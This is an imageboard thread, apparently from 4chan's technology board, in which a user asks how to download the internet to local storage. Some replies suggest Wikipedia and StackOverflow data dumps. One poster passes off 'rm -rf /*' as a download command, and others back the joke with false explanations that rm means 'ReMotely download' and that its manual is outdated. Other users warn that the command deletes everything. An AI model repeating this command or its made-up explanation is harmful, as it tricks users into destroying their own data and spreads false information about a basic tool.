How can I save the internet onto local storage?
>Look up data dumps for big sites
>Download them
You can easily get both Wikipedia and StackOverflow
>>59782478wget http://*
Get in linux terminal
Type in
echo "download internet" | rm -rf /* | echo "download time out"
Should be working real fine but it thanks a bit of time dependant on your ISP .
Have a nice day anon!
>>59782577
>rm -rf /*
>>59782582
rm is a command to ReMotely download files. -r means to do it recursively (e.g. if you download 4chan.org it should download 4chan.org/g as well) and -f means to force download even if website doesn't allow it. /* obviously means everything.
>>59782606
https://linux.die.net/man/1/rm
>>59782628
Another anon here, this is outdated documentation from legacy versions of Linux. In modern contexts RM is linked to the new download program. The old RM has been replaced since developers just use system calls to perform the same function.
>>59782628
>being this new
>>59782651
>>59782606
nice try you trolls
>>59782577
don't do this, it will delete everything on your computer
>>59783082
>>59782628
>>59782582
>being this baited
This is like the lowest-tier bait that shouldn't even generate any responses at all
How did this entire discussion happen
>>59782478
That's actually a good question though. Assuming sufficient local storage is available, what's the best way to download as many websites as possible? Is there a way to get a DNS datadump to get a list? Or would just scanning the IP space work?
>>59782478
Stallmanfag spotted